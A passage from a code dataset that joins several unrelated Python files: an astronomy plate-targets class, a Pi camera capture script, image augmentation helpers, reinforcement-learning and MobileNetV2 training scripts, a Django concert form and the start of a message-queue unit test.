GohanPlateTargetsWarning)\n self.template = True\n\n data = yanny.yanny(self.path, np=True)\n\n self.comments = self._getComments(data)\n self.structure = table.Table(data['PLTTRGT'])\n\n if self.template:\n self.structure.remove_row(0)\n\n def write(self):\n \"\"\"Writes the current instance to a Yanny file.\"\"\"\n\n path = os.path.join(os.path.dirname(utils.getPlateTargetsPath(1)),\n 'standardPlateTargets.par')\n\n path, nAppended = super(StandardPlateTargets, self).write(\n path=path, useCatID=False)\n\n log.debug('standardPlateTargets saved to {0}'.format(path))\n log.debug('{0} targets appended to standardPlateTargets'\n .format(nAppended))\n\n return path, nAppended\n\n def addTargets(self, plateid, mangaids=None, **kwargs):\n \"\"\"Adds targets to the standard plate targets.\"\"\"\n\n mangaStandardPath = utils.getPlateInputPath(plateid, mode='standard',\n format='plateid')\n\n if mangaids is None:\n mangaStandard = table.Table(yanny.yanny(mangaStandardPath, np=True)['MANGAINPUT'])\n mangaids = list(map(lambda xx: xx.strip(), mangaStandard['mangaid']))\n\n addedIndices = []\n\n overwrite = kwargs.get('overwrite', False)\n\n commonData, mangaids, plateid = super(\n StandardPlateTargets, self).addTargets(\n mangaids=mangaids, plateid=plateid,\n mangaScience=mangaStandardPath)\n\n specificData = self.getSpecificData(mangaids, plateid)\n\n # Finally we add the data target by target.\n for mangaid in mangaids:\n\n # We combine both dictionaries\n targetData = commonData[mangaid]\n\n # Removes columns that are not in the template\n remove_keys = []\n for key in targetData:\n if key not in self.structure.colnames:\n remove_keys.append(key)\n\n for key in remove_keys:\n targetData.pop(key)\n\n if mangaid in specificData:\n targetData.update(specificData[mangaid])\n\n # Checks if the targets already exists in plateTargets.\n existing = False\n\n if plateid is not None:\n\n # Checks if the tuple (mangaid, plateid) already exists in\n # plateTargets.\n plateTargetRow = self.structure[\n (self.structure['mangaid'] == mangaid) &\n (self.structure['plateid'] == plateid)]\n\n if len(plateTargetRow) > 0:\n # If it exists, checks if overwrite is True\n if overwrite:\n existing = True\n log.warning('replacing target mangaid={0} in plateid={1}'\n .format(mangaid, plateid), GohanPlateTargetsWarning)\n else:\n # If overwrite is False, skips this target.\n log.debug('skipping mangaid={0} because it is already '\n 'in plateTargets.'.format(mangaid))\n continue\n\n # Cleans up values\n targetData = self._cleanupTargetData(targetData)\n\n # Applies target fixes\n targetData = self._applyTargetFix(targetData)\n\n if targetData['iauname'] == -999.:\n targetData['iauname'] = '-999'\n\n # Adds the new targets\n if not existing:\n self.structure.add_row(targetData)\n addedIndices.append(len(self.structure) - 1)\n else:\n # If the target already exists, replaces it values\n idx = np.where((self.structure['mangaid'] == mangaid) &\n (self.structure['plateid'] == plateid))\n\n for field in targetData:\n self.structure[field][idx] = targetData[field]\n addedIndices.append(idx[0][0])\n\n self._nAppended += 1\n\n log.debug('mangaid={0} added to standardPlateTargets'\n .format(mangaid))\n\n return self.structure[addedIndices]\n\n def getSpecificData(self, mangaids, plateid):\n \"\"\"Gathers star parameters from mangaStandard.\"\"\"\n\n if plateid is None:\n raise GohanPlateTargetsError('plateid required to retrieve '\n 'specific data')\n\n requiredFields = utils.getRequiredPlateTargetsColumns()\n specificFields = [field for field in self.structure.colnames\n if field not in requiredFields]\n\n mangaStandardPath = utils.getPlateInputPath(\n plateid, mode='standard', format='plateid')\n mangaStandard = table.Table(\n yanny.yanny(mangaStandardPath, np=True)['MANGAINPUT'])\n mangaStandard = _toLowerCase(mangaStandard)\n mangaStandard['mangaid'] = list(map(lambda xx: xx.strip(), mangaStandard['mangaid']))\n\n specificData = {}\n for mangaid in mangaids:\n\n specificData[mangaid] = {}\n\n row = mangaStandard[mangaStandard['mangaid'] == mangaid.strip()][0]\n\n for field in specificFields:\n if field in mangaStandard.colnames:\n if field == 'extinction':\n if len(row[field]) == 7:\n specificData[mangaid][field] = row[field][2:]\n continue\n specificData[mangaid][field] = row[field]\n else:\n if field in ['extinction', 'pmra', 'pmdec']:\n specificData[mangaid][field] = 0.\n elif field == 'epoch_imaging':\n if 'epoch' in mangaStandard.colnames:\n specificData[mangaid][field] = row['epoch']\n else:\n specificData[mangaid][field] = -999.\n else:\n specificData[mangaid][field] = -999.\n\n return specificData\n","sub_path":"python/Gohan/StandardPlateTargets.py","file_name":"StandardPlateTargets.py","file_ext":"py","file_size_in_byte":8117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"195451812","text":"import sys\nsys.path.insert(0,'/home/pi/zumi/lib')\nfrom TawnCam import PiCamera\nimport time\nimport cv2\nfrom IPython import display\nimport PIL.Image\n\n\ndef clean_up():\n camera.shutdown() \n exit()\n\ncamera = PiCamera(image_w=64, image_h=64, image_d=3, framerate=10)\n\ncommand = 'start'\nSTATE = ''\ncnt = 0\nend_cnt = 100\ntry:\n while True: \n if end_cnt == cnt :\n cmmand = 'start'\n image = camera.run()\n image = cv2.flip(image, -1)\n \n if command == 'start':\n command = input(\"start:\") \n end_cnt = input(\"how much:\")\n cnt = 0\n if command == 'a':\n STATE = 'ar_left' \n elif command == 's':\n STATE = 'ar_stop'\n elif command == 'd':\n STATE = 'ar_right' \n command = \"\" \n cnt += 1\n print(STATE + \"!\" + cnt)\n \n \n #if command !=\"\":\n # print (\"restart\")\n # STATE = \"re_start\"\n if command == \"\" and STATE in ['ar_stop', 'ar_left', 'ar_right']:\n file_name = \"/home/pi/zumi/sample/deep-learning-demos/arrow/images/\" + str(time.time()) + \".\" + command + \".jpg\"\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n cv2.imwrite(file_name, image)\n else:\n print(\"# bad command: \" + command)\n command = 'start'\n time.sleep(1)\nfinally:\n clean_up()\n","sub_path":"sample/deep-learning-demos/arrow/take_picture.py","file_name":"take_picture.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"583159729","text":"# coding = utf-8\nimport numpy as np \nimport cv2\ndef add_gasuss_noise(image, mean=0, var=0.001):\n ''' \n 添加高斯噪声\n mean : 均值 \n var : 方差\n '''\n image = np.array(image/255, dtype=float)\n noise = np.random.normal(mean, var ** 0.5, image.shape)\n out = image + noise\n if out.min() < 0:\n low_clip = -1.\n else:\n low_clip = 0.\n out = np.clip(out, low_clip, 1.0)\n out = np.uint8(out*255)\n return out\ndef add_haze(image, t=0.6, A=1):\n '''\n 添加雾霾\n t : 透视率 0~1\n A : 大气光照\n '''\n out = image*t + A*255*(1-t)\n return out\ndef ajust_image(image, cont=1, bright=0):\n '''\n 调整对比度与亮度\n cont : 对比度,调节对比度应该与亮度同时调节\n bright : 亮度\n '''\n out = np.uint8(np.clip((cont * image + bright), 0, 255))\n # tmp = np.hstack((img, res)) # 两张图片横向合并(便于对比显示)\n return out\ndef ajust_image_hsv(image, h=1, s=1, v=0.8):\n '''\n 调整HSV通道,调整V通道以调整亮度\n 各通道系数\n '''\n HSV = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n H, S, V = cv2.split(HSV)\n H2 = np.uint8(H * h)\n S2 = np.uint8(S * s)\n V2 = np.uint8(V * v)\n hsv_image = cv2.merge([H2, S2, V2])\n out = cv2.cvtColor(hsv_image, cv2.COLOR_HSV2BGR)\n return out\ndef ajust_jpg_quality(image, q=100, save_path=None):\n '''\n 调整图像JPG压缩失真程度\n q : 压缩质量 0~100\n '''\n if save_path is None:\n cv2.imwrite(\"jpg_tmp.jpg\", image, [int(cv2.IMWRITE_JPEG_QUALITY), q])\n out = cv2.imread('jpg_tmp.jpg')\n return out\n else:\n cv2.imwrite(save_path, image, [int(cv2.IMWRITE_JPEG_QUALITY), q])\ndef add_gasuss_blur(image, kernel_size=(3, 3), sigma=0.1):\n '''\n 添加高斯模糊\n kernel_size : 模糊核大小\n sigma : 标准差\n '''\n out = cv2.GaussianBlur(image, kernel_size, sigma)\n return out\ndef test_methods():\n img = cv2.imread('test.jpg')\n out = add_haze(img)\n cv2.imwrite(\"add_haze.jpg\", out)\n out = add_gasuss_noise(img)\n cv2.imwrite(\"add_gasuss_noise.jpg\", out)\n out = add_gasuss_blur(img)\n cv2.imwrite(\"add_gasuss_blur.jpg\", out)\n out = ajust_image(img)\n cv2.imwrite(\"ajust_image.jpg\", out)\n out = ajust_image_hsv(img)\n cv2.imwrite(\"ajust_image_hsv.jpg\", out)\n ajust_jpg_quality(img, save_path='ajust_jpg_quality.jpg')\n\ntest_methods()","sub_path":"addnoise.py","file_name":"addnoise.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"358367494","text":"import torch\nimport gym\nimport numpy as np\nfrom TD3 import TD3\nfrom DDPG import DDPG\nfrom utils import NaivePrioritizedBuffer\nimport os\nimport roboschool, gym\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport torch.optim as optim\nimport Box2D\nimport pdb\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom utils import DrawLine\nimport math\nimport argparse\n\nfrom torch.distributions import Beta\nfrom torch.utils.data.sampler import BatchSampler, SubsetRandomSampler\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nparser = argparse.ArgumentParser(description='Train a TD3 agent for the CarRacing-v0')\nparser.add_argument('policy', help='Choose policy')\nargs = parser.parse_args()\n\n\nclass Env():\n \"\"\"\n Environment wrapper for CarRacing\n \"\"\"\n\n def __init__(self, env_name, random_seed, img_stack, action_repeat):\n self.env = gym.make(env_name)\n self.env.seed(random_seed)\n self.action_space = self.env.action_space\n self.reward_threshold = self.env.spec.reward_threshold\n self.img_stack = img_stack\n self.action_repeat = action_repeat\n\n def reset(self):\n self.counter = 0\n self.av_r = self.reward_memory()\n\n self.die = False\n img_rgb = self.env.reset()\n # print(img_rgb)\n img_gray = self.rgb2gray(img_rgb)\n self.stack = [np.expand_dims(img_gray, axis=0)] * self.img_stack # four frames for decision\n return torch.FloatTensor(self.stack).permute(1, 0, 2, 3)\n\n def step(self, action):\n total_reward = 0\n for i in range(self.action_repeat):\n img_rgb, reward, die, _ = self.env.step(action)\n # don't penalize \"die state\"\n if die:\n reward += 100\n # green penalty\n if np.mean(img_rgb[:, :, 1]) > 185.0:\n reward -= 0.05\n total_reward += reward\n # if no reward recently, end the episode\n done = True if self.av_r(reward) <= -0.1 else False\n if done or die:\n break\n img_gray = self.rgb2gray(img_rgb)\n self.stack.pop(0)\n self.stack.append(np.expand_dims(img_gray, axis=0))\n assert len(self.stack) == self.img_stack\n return torch.FloatTensor(self.stack).permute(1, 0, 2, 3), total_reward, done, die\n\n def render(self, *arg):\n self.env.render(*arg)\n\n @staticmethod\n def rgb2gray(rgb, norm=True):\n # rgb image -> gray [0, 1]\n gray = np.dot(rgb[..., :], [0.299, 0.587, 0.114])\n if norm:\n # normalize\n gray = gray / 128. - 1.\n return gray\n\n @staticmethod\n def reward_memory():\n # record reward for last 100 steps\n count = 0\n length = 100\n history = np.zeros(length)\n\n def memory(reward):\n nonlocal count\n history[count] = reward\n count = (count + 1) % length\n return np.mean(history)\n\n return memory\n\n\ndef train(env):\n ######### Hyperparameters #########\n env_name = env\n log_interval = 10 # print avg reward after interval\n random_seed = 0\n gamma = 0.99 # discount for future rewards\n batch_size = 100 # num of transitions sampled from replay buffer\n lr = 0.001\n exploration_noise = 0.5\n polyak = 0.995 # target policy update parameter (1-tau)\n policy_noise = 0.2 # target policy smoothing noise\n noise_clip = 0.5\n policy_delay = 2 # delayed policy updates parameter\n max_episodes = int(1e8) # max num of episodes\n max_timesteps = 500 # max timesteps in one episode\n save_every = 100 # model saving interal\n img_stack = 4 # number of image stacks together\n action_repeat = 8 # repeat action in N frames\n max_size = 1e6\n vis = True\n\n \"\"\" parameters for epsilon declay \"\"\"\n epsilon_start = 1\n epsilon_final = 0.01\n decay_rate = max_episodes / 50\n\n \"\"\" beta Prioritized Experience Replay\"\"\"\n beta_start = 0.4\n beta_frames = 25000\n\n # if not os.path.exists('./TD3tested'):\n # os.mkdir('./TD3tested')\n directory = \"./{}\".format(env_name) # save trained models\n filename = \"TD3_{}_{}\".format(env_name, random_seed)\n\n ###################################\n\n env = Env(env_name, random_seed, img_stack, action_repeat)\n # print(\"env\")\n action_dim = env.action_space.shape[0]\n # if vis:\n # draw_reward = DrawLine(env=\"car\", title=\"PPO\", xlabel=\"Episode\", ylabel=\"Moving averaged episode reward\")\n if args.policy == 'TD3':\n policy = TD3(action_dim, img_stack)\n if args.policy == 'DDPG':\n policy = DDPG(action_dim, img_stack)\n replay_buffer = NaivePrioritizedBuffer(int(max_size))\n\n if random_seed:\n print(\"Random Seed: {}\".format(random_seed))\n torch.manual_seed(random_seed)\n\n # logging variables:\n\n log_f = open(\"log.txt\", \"w+\")\n ## for plot\n Reward = []\n total_timesteps = 0\n episode_timesteps = 0\n running_score = 0\n\n # training procedure:\n for episode in range(1, max_episodes + 1):\n state = env.reset()\n # print(\"here\")\n episode_timesteps = 0\n score = 0\n\n for t in range(max_timesteps):\n # select action and add exploration noise:\n # print(\"state: \" + str(state))\n action = policy.select_action(state)\n # print(\"action: \" + str(action))\n exploration_noise = (epsilon_start - epsilon_final) * math.exp(-1. * total_timesteps / decay_rate)\n action = action + np.random.normal(0, exploration_noise, size=action_dim)\n action = action.clip(env.action_space.low, env.action_space.high)\n # print(\"action clipped: \" + str(action))\n\n # take action in env:\n next_state, reward, done, die = env.step( action * np.array([2., 1., 1.]) + np.array([-1., 0., 0.]) )\n # print(\"state: \" +str(next_state))\n env.render()\n replay_buffer.add(state, next_state, action, reward, float(done))\n state = next_state\n\n score += reward\n total_timesteps += 1\n episode_timesteps += 1\n\n # if episode is done then update policy:\n if done or t == (max_timesteps - 1):\n beta = min(1.0, beta_start + total_timesteps * (1.0 - beta_start) / beta_frames)\n policy.train(replay_buffer, episode_timesteps, beta)\n break\n\n running_score = running_score * 0.99 + score * 0.01\n\n\n\n if episode % log_interval == 0:\n # if vis:\n # draw_reward(xdata = episode, ydata = running_score)\n log_f.write('Ep {}\\tLast score: {:.2f}\\tMoving average score: {:.2f}\\n'.format(episode, score, running_score))\n log_f.flush()\n print('Ep {}\\tLast score: {:.2f}\\tMoving average score: {:.2f}'.format(episode, score, running_score))\n\n\n # if avg reward > 300 then save and stop traning:\n if running_score >= 900:\n # if episode % save_every == 0:\n print(\"########## Model received ###########\")\n name = filename\n policy.save(directory, name)\n log_f.close()\n break\n\n if episode % 100 == 0:\n if not os.path.exists(directory):\n os.mkdir(directory)\n policy.save(directory, filename)\n\n\nif __name__ == \"__main__\":\n train('CarRacing-v0')","sub_path":"car_racing.py","file_name":"car_racing.py","file_ext":"py","file_size_in_byte":7529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"190129197","text":"2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\n# import the necessary packages\nimport cv2\n\n# load the image and show it\nimage = cv2.imread(\"./images/florida_trip.png\")\ncv2.imshow(\"Original\", image)\n\n# cropping an image is accomplished using simple NumPy array slices --\n# let's crop the face from the image\nface = image[85:250, 85:220]\ncv2.imshow(\"Face\", face)\ncv2.waitKey()\n\n# ...and now let's crop the entire body\nbody = image[90:450, 0:290]\ncv2.imshow(\"Body\", body)\ncv2.waitKey()\nred = (0, 0, 255)\n\n# cv2.line(image, (85, 85), (220, 220), red, 5)\n\ncv2.imshow(\"Canvas\", image)\ncv2.waitKey()\n\n\ntry1 = image[173:235, 13:81]\ncv2.imshow(\"try1\", try1)\ncv2.waitKey()\n\n\ntry2 = image[124:212, 225:380]\ncv2.imshow(\"try2\", try2)\ncv2.waitKey()\n\ntry3 = image[90:450, 0:290]\ncv2.imshow(\"try3\", try3)\ncv2.waitKey()\n\n\ntry4 = image[85:250, 85:220]\ncv2.imshow(\"try4\", try4)\ncv2.waitKey()\n\n\n\ncv2.destroyAllWindows()","sub_path":"module1/cropping-1.4.5.py","file_name":"cropping-1.4.5.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"597788071","text":"# Code your solution here\nfigure_list = {\n \"3\":\"Triangle\",\n \"4\":\"Quadrilateral\",\n \"5\":\"Pentagon\",\n \"6\":\"Hexagon\",\n \"7\":\"Heptagon\",\n \"8\":\"Octagon\", \n \"9\":\"Nonagon\"\n}\ndata = []\n# figure = input(\"figure: \")\nfigure = \"5\"\nif figure in figure_list:\n data.append(figure_list[figure])\n print (figure_list[figure])\n \nelse: \n print(figure) \n","sub_path":"introduction_and_environment/data_types_and_control_flow/3_shape_check/Solution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"425926791","text":"# https://stackoverflow.com/questions/50380769/how-to-create-a-autocomplete-input-field-in-a-form-using-django\n\nfrom django import forms\nfrom django.forms import ModelForm\nfrom django.forms.widgets import NumberInput\nfrom django.forms.models import inlineformset_factory\n\nimport datetime\n\nfrom .models import Concert, Genre, Artist, Organisation, Location, GigFinderUrl\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Row, Column, Div, ButtonHolder, Submit, HTML, Button\n\nfrom dal import autocomplete\n\nclass ConcertForm(forms.ModelForm):\n location = forms.ModelChoiceField(\n queryset=Location.objects.all(),\n widget=autocomplete.ModelSelect2(url='location_autocomplete_select', attrs={\n # Set some placeholder\n 'data-placeholder': 'Autocomplete ...',\n # Only trigger autocompletion after 3 characters have been typed\n 'data-minimum-input-length': 3,\n },),\n required=False,\n )\n\n class Meta:\n model = Concert\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(ConcertForm, self).__init__(*args, **kwargs)\n self.fields['artist'] = forms.ModelMultipleChoiceField(\n queryset=Artist.objects.all(),\n widget=autocomplete.ModelSelect2Multiple(url='artist_autocomplete_select')\n )\n self.fields['organisation']=forms.ModelMultipleChoiceField(\n queryset=Organisation.objects.all(),\n widget=autocomplete.ModelSelect2Multiple(url='organisation_autocomplete_select',\n forward=['location'])\n )\n self.fields['date']=forms.DateField(help_text=datetime.date.today)\n self.fields['cancelled']=forms.BooleanField(\n widget=forms.CheckboxInput(),\n required=False)\n self.fields['verified']=forms.BooleanField(\n widget=forms.CheckboxInput(),\n required=False)\n self.fields['manual']=forms.BooleanField(widget=forms.CheckboxInput(), required=False)\n self.fields['ignore']=forms.BooleanField(widget=forms.CheckboxInput(), required=False)\n self.fields['genre']=forms.ModelMultipleChoiceField(\n queryset=Genre.objects.all(),\n widget=forms.CheckboxSelectMultiple,\n required=False)\n\n self.fields['description']=forms.CharField(widget=forms.Textarea(attrs={'rows': 1 }), required=False)\n self.fields['annotation']=forms.CharField(widget=forms.Textarea(attrs={'rows': 1}), required=False)\n self.fields['program']=forms.CharField(widget=forms.Textarea(attrs={'rows': 1}), required=False)\n self.fields['evidence']=forms.CharField(widget=forms.Textarea(attrs={'rows': 1}), required=False)\n\n\n self.fields['organisation'].widget.attrs.update({'class' : 'autocomplete-list'})\n self.fields['artist'].widget.attrs.update({'class' : 'autocomplete-list'})\n self.fields['location'].widget.attrs.update({'class' : 'autocomplete-list'})\n self.fields['until_date']=forms.DateField(help_text=datetime.date.today, required=False)\n self.fields['time']=forms.TimeField(help_text=str(datetime.time(11,30))[0:5], required=False)\n\n self.helper=FormHelper()\n\n self.helper.layout=Layout(\n HTML(\"\"\"\n

Create/update a concert

\n \"\"\"),\n Row(\n Column('title', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('artist', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('date', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('organisation', css_class='form-group col-md-6 mb-0'), \n Column('location', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('description', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n\n Div( \n Row(\n Column('evidence', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('annotation', css_class='form-group col-md-12 mb-0')\n ),\n Row(\n Column('program', css_class='form-group col-md-12 mb-0')\n ),\n Row(\n Column('cancelled', css_class='form-group col-md-3 mb-0'),\n Column('verified', css_class='form-group col-md-3 mb-0'),\n Column('manual', css_class='form-group col-md-3 mb-0'),\n Column('ignore', css_class='form-group col-md-3 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('until_date', css_class='form-group col-md-4 mb-0'),\n Column('time', css_class='form-group col-md-4 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('genre', css_class='form-group col-md-12 mb-0'),\n css_class='form-row'\n ),\n Row(\n Column('latitude', css_class='form-group col-md-6 mb-0'),\n Column('longitude', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n css_id='extra-fields'\n ),\n Row(\n Button('show-details', 'Toggle-details', onclick=\"toggleDetails()\", css_class=\"btn-toggle\")),\n )\n\n self.helper.add_input(Submit('submit', 'Submit', css_class='btn btn-outline-primary btn-custom form-left-button'))\n self.helper.form_method = 'POST'\n\n\n# to create a nested form to have ignore period for gigfinderurls related to an artist\nGigFinderUrlFormset = inlineformset_factory(\n Artist, GigFinderUrl, extra=0, fields=('gigfinder','active_start','active_end'), widgets = {\n 'active_start': forms.DateInput(format='%d-%m-%Y'),\n 'active_end': forms.DateInput(format='%d-%m-%Y')\n }, help_texts={'active_start':'(e.g. 01-01-2020)','active_end':'(e.g. 15-01-2020)'})\n","sub_path":"hlwtadmin/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"425390611","text":"\"\"\"\nTrain the MobileNet V2 model\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport pandas as pd\n\nfrom mobilenet_v2 import MobileNetv2\n\nfrom keras.optimizers import Adam\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint\nfrom keras.layers import Conv2D, Reshape, Activation\nfrom keras.models import Model\n\nimport tensorflow as tf\n\nfrom sklearn.metrics import classification_report\n\nimport numpy as np\n\ndef main(argv):\n parser = argparse.ArgumentParser()\n # Required arguments.\n parser.add_argument(\n \"--classes\",\n help=\"The number of classes of dataset.\")\n # Optional arguments.\n parser.add_argument(\n \"--size\",\n default=224,\n help=\"The image size of train sample.\")\n parser.add_argument(\n \"--batch\",\n default=32,\n help=\"The number of train samples per batch.\")\n parser.add_argument(\n \"--epochs\",\n default=300,\n help=\"The number of train iterations.\")\n parser.add_argument(\n \"--weights\",\n default=False,\n help=\"Fine tune with other weights.\")\n parser.add_argument(\n \"--tclasses\",\n default=0,\n help=\"The number of classes of pre-trained model.\")\n parser.add_argument(\n \"--tflite\",\n \"-tl\",\n action=\"store_true\",\n help=\"The name of file to save the TFLite model\")\n parser.add_argument(\n \"--checkpoint\",\n default=\"\",\n help='Defines the path to save the checkpoints'\n )\n\n args = parser.parse_args()\n\n train(int(args.batch), \n int(args.epochs), \n int(args.classes), \n int(args.size), \n args.weights, \n int(args.tclasses), \n args.tflite,\n args.checkpoint)\n\ndef save_map_labels(data):\n with open('labels.json', 'w') as f:\n f.write(str(data))\n f.flush()\n\ndef generate(batch, size):\n \"\"\"Data generation and augmentation\n\n # Arguments\n batch: Integer, batch size.\n size: Integer, image size.\n\n # Returns\n train_generator: train set generator\n validation_generator: validation set generator\n count1: Integer, number of train set.\n count2: Integer, number of test set.\n \"\"\"\n\n # Using the data Augmentation in traning data\n ptrain = 'data/train'\n pval = 'data/validation'\n\n datagen1 = ImageDataGenerator(\n rescale=1. / 255,\n shear_range=0.2,\n zoom_range=0.2,\n rotation_range=90,\n width_shift_range=0.2,\n height_shift_range=0.2,\n horizontal_flip=True)\n\n datagen2 = ImageDataGenerator(rescale=1. / 255)\n\n train_generator = datagen1.flow_from_directory(\n ptrain,\n target_size=(size, size),\n batch_size=batch,\n class_mode='categorical')\n\n save_map_labels(train_generator.class_indices)\n\n validation_generator = datagen2.flow_from_directory(\n pval,\n target_size=(size, size),\n batch_size=batch,\n class_mode='categorical')\n\n count1 = 0\n for root, dirs, files in os.walk(ptrain):\n for each in files:\n count1 += 1\n\n count2 = 0\n for root, dirs, files in os.walk(pval):\n for each in files:\n count2 += 1\n\n return train_generator, validation_generator, count1, count2\n\n\ndef fine_tune(num_classes, weights, model):\n \"\"\"Re-build model with current num_classes.\n\n # Arguments\n num_classes, Integer, The number of classes of dataset.\n tune, String, The pre_trained model weights.\n model, Model, The model structure.\n \"\"\"\n model.load_weights(weights)\n\n x = model.get_layer('Dropout').output\n x = Conv2D(num_classes, (1, 1), padding='same')(x)\n x = Activation('softmax', name='softmax')(x)\n output = Reshape((num_classes,))(x)\n\n model = Model(inputs=model.input, outputs=output)\n\n return model\n\ndef keep_training(weights, model):\n model.load_weights(weights)\n return model\n\ndef create_callbacks(model_checkpoint=\"\"):\n \"\"\"\n # Arguments\n None\n \"\"\"\n\n callbacks = [\n EarlyStopping(monitor='val_acc',\n patience=30,\n verbose=1,\n mode='auto',\n restore_best_weights=True),\n ReduceLROnPlateau(monitor=\"val_loss\", \n factor=0.5, \n patience=10, \n verbose=1,\n mode='auto',\n min_delta=0.00001,\n cooldown=0,\n min_lr=0)\n ]\n if model_checkpoint:\n callbacks.append(\n ModelCheckpoint(\n model_checkpoint + 'weights-{epoch:02d}-{val_loss:.2f}-{val_acc:.3f}.hdf5',\n verbose=1,\n save_best_only=True\n )\n )\n\n return callbacks\n\ndef generate_report(model, generator, batch, count):\n y_pred = model.predict_generator(generator, steps= count//batch)\n \n list_ = []\n\n b = count//batch\n\n for i in range(b):\n aux = generator[i]\n aux2 = 0\n for j in aux:\n aux2 += 1\n if aux2 % 2 == 0:\n for k in j:\n list_.append(k.tolist())\n labels = [ i[0] for i in sorted(generator.class_indices.items(), key=lambda x: x[1])]\n print(classification_report(\n np.argmax(list_, axis=1),\n np.argmax(y_pred, axis=1),\n target_names = labels\n ))\n\ndef model_feed(size, num_classes):\n ''' \n\n Wrapper the model creation\n \n #Arguments\n num_classes: Integer, The number of classes to create a model.\n size: tuple, The shape of the data.\n\n #Return:\n The model\n \n '''\n\n return MobileNetv2(size, num_classes)\n\n\ndef train(batch, epochs, num_classes, size, weights, tclasses, tflite, checkpoint):\n \"\"\"Train the model.\n\n # Arguments\n batch: Integer, The number of train samples per batch.\n epochs: Integer, The number of train iterations.\n num_classes, Integer, The number of classes of dataset.\n size: Integer, image size.\n weights, String, The pre_trained model weights.\n tclasses, Integer, The number of classes of pre-trained model.\n tflite, Boolean, Convert the final model to a tflite model.\n checkpoint, String, The path to store the checktpoints\n \"\"\"\n\n train_generator, validation_generator, count1, count2 = generate(batch, size)\n\n if weights:\n if tclasses:\n print(\"fine tunning\")\n model = model_feed((size, size, 3), tclasses)\n model = fine_tune(num_classes, weights, model)\n else:\n print(\"Loading Weights\")\n model = model_feed((size, size, 3), num_classes)\n model = keep_training(weights, model)\n\n else:\n model = model_feed((size, size, 3), num_classes)\n\n opt = Adam()\n model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n\n calls = create_callbacks(model_checkpoint = checkpoint)\n\n hist = model.fit_generator(\n train_generator,\n validation_data=validation_generator,\n steps_per_epoch=count1 // batch,\n validation_steps=count2 // batch,\n epochs=epochs,\n callbacks=calls)\n \n if not os.path.exists('model'):\n os.makedirs('model')\n\n df = pd.DataFrame.from_dict(hist.history)\n df.to_csv('model/hist.csv', encoding='utf-8', index=False)\n print(\"Saving weights\")\n model.save_weights('model/weights.h5')\n \n model_name = \"mobile_model.h5\"\n\n if tflite:\n print(\"Saving model\")\n model.save(model_name)\n print(\"Converting model\")\n convert_to_lite(model_name)\n\n\ndef convert_to_lite(model, tflite_name=\"converted_model\"):\n \"\"\"\n Convert a saved model to tf lite format.\n\n # Arguments\n model: String, path to .h5 file model\n \"\"\"\n tflite_name += \".tflite\"\n converter = tf.contrib.lite.TFLiteConverter.from_keras_model_file(model)\n tflite_model = converter.convert()\n open(tflite_name, \"wb\").write(tflite_model)\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"144706124","text":"import random\nimport string\nimport unittest\n\nfrom redis import Redis\n\nfrom pyrowire import pyrowire as pyro\nfrom pyrowire.config import configuration as config\nfrom pyrowire.messaging.message import message_from_request\nfrom test import test_settings\n\npyro.configure(test_settings)\n\nclass TestMessageQueue(unittest.TestCase):\n def setUp(self):\n self.test_app = config.app().test_client()\n self.topic = 'sample'\n self.inbound = '/queue/%s?Body=%s&From=+1234567890&MessageSid=%s&NumMedia=%s'\n self.sid = ''.join(random.choice(string.ascii_letters) for i in range(34))\n\n self.redis = Redis(config.redis('host'), int(config.redis('port')), int(config.redis('db')), config.redis('password'))\n\n def tearDown(self):\n self.redis.delete('%s.submitted' % self.topic)\n self.redis.delete('%s.pending' % self.topic)\n self.redis.delete('%s.completed' % self.topic)\n\n def test_profane_message(self):\n expected_response = config.validators(self.topic)['profanity']\n message = 'fuck'\n response = self.test_app.get(self.inbound % (self.topic, message, self.sid, 0), follow_redirects=True)\n\n data = str(response.data).split('')[1].split('')[0]\n\n self.assertEqual(response.status, \"200 OK\")\n self.assertEqual(data, expected_response)\n\n def test_message_too_long(self):\n message = ''.join('c' for i in range(161))\n expected_response = 